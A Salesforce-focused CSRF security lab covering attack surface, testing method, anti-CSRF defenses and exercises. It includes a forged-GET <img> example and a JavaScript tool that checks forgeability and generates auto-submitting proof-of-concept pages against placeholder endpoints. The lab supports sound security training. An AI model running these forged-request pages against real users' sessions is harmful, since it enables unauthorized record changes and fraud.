Cross-site Request Forgery (CSRF)

This lab covers how CSRF applies to Salesforce web flows, how to verify exploitability against state-changing operations, and how to implement durable anti-CSRF controls.

Executive Summary

CSRF makes a victim's browser send a request the victim never intended, and the server accepts it because the browser attaches the session cookie automatically. Standard Visualforce forms carry a platform-issued anti-CSRF token, so in Salesforce-centric applications the risk concentrates in custom code: endpoints and page actions that rely on the session cookie alone and never verify that the request was intended by the user and originated from the application itself.

Salesforce Attack Surface

  • Custom Visualforce pages that mutate state from the page-level action attribute, which runs on page load (a GET) without the form token
  • Custom controller actions or endpoints invoked from the browser and authenticated by the session cookie alone, without anti-CSRF defenses
  • GET handlers performing destructive or business-critical operations
  • Custom authentication/profile update workflows lacking intent validation
  • Custom pages or endpoints reachable cross-origin (for example on Sites or Experience Cloud) with permissive CORS or no Origin validation

Business Impact

  • Unauthorized changes: record creation, updates, and deletion under victim session
  • Workflow abuse: approvals granted, records reassigned, or lifecycle stages advanced without the user's consent
  • Security posture degradation: user settings altered without consent
  • Fraud and integrity risk: business operations manipulated silently

Attack Flows

Representative CSRF chain:

  • Victim holds an authenticated Salesforce session in the browser
  • Victim visits an attacker-controlled page
  • That page makes the browser issue a forged request to the trusted endpoint; the browser attaches the victim's session cookie
  • Server processes the request as a legitimate user action

An <img> element can only forge a GET, so the pattern below works against a handler that mutates state on GET; a POST handler needs an auto-submitting form instead:

<!-- Illustrative forced request pattern -->
<img src="https://target.example/apex/DeleteAccount?id=001xx000003DGbQ" />

Testing Methodology

  • Inventory all state-changing operations and the HTTP methods each one accepts, including whether a GET is tolerated
  • Validate anti-CSRF token presence, session binding, integrity, and one-time semantics (a token accepted twice, or accepted from another session, fails the check)
  • Attempt a cross-origin trigger from a controlled external page, using the delivery the endpoint's method and cookie attributes allow (image or navigation for GET, auto-submitting form for POST)
  • Assess Origin/Referer policy enforcement and failure behavior: whether the endpoint fails closed when both headers are absent
  • Confirm exploitability with reproducible evidence of the state change (record before and after, request and response captures)
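The following is an added example, not part of the original lab and not Salesforce code, covering the Attack Flows chain above and the cross-origin trigger step of this methodology. It first triages whether a candidate request can be forged from a plain attacker page at all (a request that needs a CORS preflight, or a session cookie marked SameSite=Strict, rules out classic CSRF), then emits the PoC page for the forgeable ones. The host target.example, the DeleteAccount and Reassign paths, and the parameter values are constructed placeholders.

```javascript
// Added example for the lab, not code from the original page or from Salesforce: triage
// whether a candidate state-changing request can be forged from an attacker page at all, then
// emit the cross-origin PoC for it. URLs, parameters and cookie attributes are constructed.

// Content types a browser sends cross-origin from a plain <form> with no CORS preflight.
const FORM_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);
// Request headers a form or <img> request may carry without triggering a preflight.
const PREFLIGHT_FREE_HEADERS = new Set(['accept', 'accept-language', 'content-language', 'content-type']);

function lowerHeaders(headers) {
  return Object.fromEntries(Object.entries(headers || {}).map(([k, v]) => [k.toLowerCase(), v]));
}

// Escape a value for a double-quoted HTML attribute so the PoC stays well-formed when a
// parameter value contains quotes or angle brackets.
function escapeAttr(value) {
  return String(value).replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Can an attacker page make the victim's browser send this request with the session cookie?
// Anything that needs a CORS preflight (method other than GET/POST, a custom header, a
// non-form content type) is not classic CSRF: the browser only sends it if the target's CORS
// policy admits the attacker origin. The cookie's SameSite attribute matters too: Strict is
// never sent cross-site, Lax only on a top-level GET navigation.
function triageForgeability(req) {
  const method = req.method.toUpperCase();
  const headers = lowerHeaders(req.headers);
  const reasons = [];
  if (method !== 'GET' && method !== 'POST') reasons.push(`method ${method} requires a preflight`);
  const custom = Object.keys(headers).filter((h) => !PREFLIGHT_FREE_HEADERS.has(h));
  if (custom.length) reasons.push(`custom header(s) require a preflight: ${custom.join(', ')}`);
  const contentType = (headers['content-type'] || 'application/x-www-form-urlencoded').split(';')[0].trim();
  if (method === 'POST' && !FORM_CONTENT_TYPES.has(contentType)) reasons.push(`content type ${contentType} requires a preflight`);
  const sameSite = (req.cookieSameSite || 'None').toLowerCase();
  if (sameSite === 'strict') reasons.push('SameSite=Strict session cookie is never sent cross-site');
  if (sameSite === 'lax' && method !== 'GET') reasons.push('SameSite=Lax session cookie is not sent on a cross-site POST');
  return { forgeable: reasons.length === 0, reasons };
}

// Emit the attacker page. GET goes out via <img>, or via a top-level navigation when the cookie
// is SameSite=Lax (an <img> load is not a navigation, so Lax would withhold the cookie); POST via
// an auto-submitting form. The <img> form is the same pattern shown under Attack Flows.
function buildCsrfPoc(req) {
  const method = req.method.toUpperCase();
  const params = Object.entries(req.params || {});
  if (method === 'GET') {
    const query = params.map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`).join('&');
    const url = query ? `${req.url}?${query}` : req.url;
    if ((req.cookieSameSite || '').toLowerCase() === 'lax') {
      return `<script>location.assign(${JSON.stringify(url).replace(/</g, '\\u003c')});</script>`;
    }
    return `<img src="${escapeAttr(url)}" alt="">`;
  }
  const enctype = (lowerHeaders(req.headers)['content-type'] || 'application/x-www-form-urlencoded').split(';')[0].trim();
  const inputs = params.map(([k, v]) => `  <input type="hidden" name="${escapeAttr(k)}" value="${escapeAttr(v)}">`);
  return [
    `<form id="csrf" method="POST" action="${escapeAttr(req.url)}" enctype="${escapeAttr(enctype)}">`,
    ...inputs,
    '</form>',
    '<script>document.getElementById("csrf").submit();</script>',
  ].join('\n');
}

// Constructed samples: the GET delete pattern from Attack Flows, a POST form with a quoted value,
// and a JSON call behind a custom header (the kind of request a plain form cannot forge).
const SAMPLE_GET_DELETE = { method: 'GET', url: 'https://target.example/apex/DeleteAccount', params: { id: '001xx000003DGbQ' } };
const SAMPLE_POST_FORM = { method: 'POST', url: 'https://target.example/apex/Reassign', params: { id: '001xx000003DGbQ', owner: 'a"b' } };
const SAMPLE_JSON_CALL = { method: 'POST', url: 'https://target.example/apex/Reassign', headers: { 'Content-Type': 'application/json', 'X-Requested-With': 'XMLHttpRequest' } };
```

Run it under Node. triageForgeability tells you before you host anything whether a cross-origin attempt can succeed, and the reasons it returns are the facts a report needs when a request turns out not to be forgeable; buildCsrfPoc produces the page you would host for Exercise 2 against a flow that is.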

Secure Engineering Patterns

  • Require per-session anti-CSRF tokens for all state-changing operations; on Visualforce, keep mutations in <apex:form> action methods rather than the page-level action attribute, and enable "Require CSRF protection on GET requests" on any page that must act on load
  • Reject destructive actions over GET; mutate only on POST or other non-safe methods
  • Enforce strict Origin/Referer validation in custom endpoints and fail closed when neither header is present
  • Set SameSite on the session cookie (Lax or Strict, as the application's cross-site flows allow) as defense in depth, not as a substitute for tokens
  • Require explicit user confirmation (a confirmation step or re-authentication) for sensitive actions

Verification Checklist

  • All state mutations protected with anti-CSRF controls
  • No business-critical mutation exposed via GET
  • Cross-origin forged requests consistently rejected
  • Token replay and missing-token scenarios blocked
  • Regression tests confirm protections across browsers and devices

Lab Exercises

This lab includes hands-on exercises to practice identifying and fixing CSRF vulnerabilities in Salesforce workflows:

  • Exercise 1: Enumerate mutation endpoints and trust assumptions
  • Exercise 2: Execute controlled CSRF PoC against vulnerable flow
  • Exercise 3: Implement anti-CSRF token and origin validation
  • Exercise 4: Re-test cross-origin attack attempts
  • Exercise 5: Build regression checklist and evidence report